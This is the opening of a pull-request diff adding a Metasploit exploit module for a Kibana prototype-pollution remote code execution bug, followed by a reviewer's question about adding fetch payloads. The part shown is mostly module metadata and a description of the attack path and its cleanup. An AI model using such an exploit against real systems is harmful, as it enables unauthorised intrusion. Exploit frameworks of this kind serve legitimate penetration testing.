modules/exploits/linux/http/kibana_upgrade_assistant_telemetry_rce.rb

```diff
@@ -0,0 +1,358 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ManualRanking # causes service to not respond until cleanup and reboot
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  # decided not to use autocheck since it doesn't work for both targets
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Kibana Upgrade Assistant Telemetry Collector Prototype Pollution',
+        'Description' => %q{
+          Kibana before version 7.6.3 suffers from a prototype pollution bug within the
+          Upgrade Assistant. By setting a new constructor.prototype.sourceURL value we're
+          able to execute arbitrary code.
+          Code execution is possible through two different ways. Either by sending data
+          directly to Elastic, or using Kibana to submit the same queries. Either method
+          enters the polluted prototype for Kibana to read.
+
+          Kibana will either need to be restarted, or collection happens (unknown time) for
+          the payload to execute. Once it does, cleanup must delete the .kibana_1 index
+          for Kibana to restart successfully. Once a callback does occur, cleanup will
+          happen allowing Kibana to be successfully restarted on next attempt.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # msf module
+          'Alex Brasetvik (alexbrasetvik)' # original PoC, analysis
+        ],
+        'References' => [
+          [ 'URL', 'https://hackerone.com/reports/852613'],
+        ],
+        'Platform' => ['linux'],
+        'Privileged' => false,
+        'Arch' => ARCH_X64,
```

Comment:
Do you think it would be worth adding `ARCH_CMD` so we can include fetch_payloads?